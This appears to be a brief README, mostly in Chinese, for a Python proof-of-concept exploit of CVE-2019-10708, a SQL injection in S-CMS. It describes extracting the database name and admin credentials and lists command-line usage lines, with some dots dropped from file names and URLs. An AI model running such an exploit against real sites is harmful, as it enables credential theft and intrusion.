CVE-2019-10708 SQL injection PoC
Scms - SQL Injection exploitpy是對於CVE-2019-10708漏洞的PoC,實現multiprocessing進行注入,取得資料庫名稱與後台管理員帳密(建議是20190401前的版本) Usage # 測試是否可注入 python3 exploitpy http:localhost/js/scmsphp --test # sleep時間為60秒與取得資料庫 python3 exploitpy http:localhost/js/scmsphp -s 60 --db # 取得A_login